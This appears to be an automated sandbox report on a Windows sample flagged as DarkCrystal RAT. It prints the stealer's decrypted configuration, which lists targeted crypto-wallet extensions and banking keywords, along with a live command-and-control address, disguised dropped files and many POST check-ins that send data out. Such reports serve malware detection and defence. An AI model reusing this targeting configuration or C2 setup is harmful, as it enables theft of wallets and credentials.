Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe; Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\Application\conhost.exe; Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\Application\conhost.exe; Joe Sandbox ML: detected
Source: 3XtEci4Mmo.exe; Joe Sandbox ML: detected
Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive","_1":""}}
Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: ["448yeouwJcxSHSru9YqksE5Gq7RzFG6bDZt9Fn5z5jp5MGBbIMqPQG8092HgX5rCfWPrjrpWc0pJYA3k5zr2arK7b2AMgYc91nZ01T2ahUwaayb88gkhOymyLRQqrc0E","f56d71433bb0e2fb950c932b49352e3f9208d708a9a063f95da637203ff919b0","0","test","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp; String decryptor: [["http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/","eternalHttpwindowsUploadsDownloadstemporary"]]
                          Source: 3XtEci4Mmo.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\78fe9fe6f28b21Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Google\Chrome\Application\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Google\Chrome\Application\088424020bedd6Jump to behavior
                          Source: 3XtEci4Mmo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 4x nop then jmp 00007FFD9B8A1DB6h0_2_00007FFD9B89086A
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FFD9BA4BECD

                          Networking

                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49955 -> 185.177.239.66:80
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox ViewASN Name: M247GB M247GB
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 1636Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----gVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRobUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 98742Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
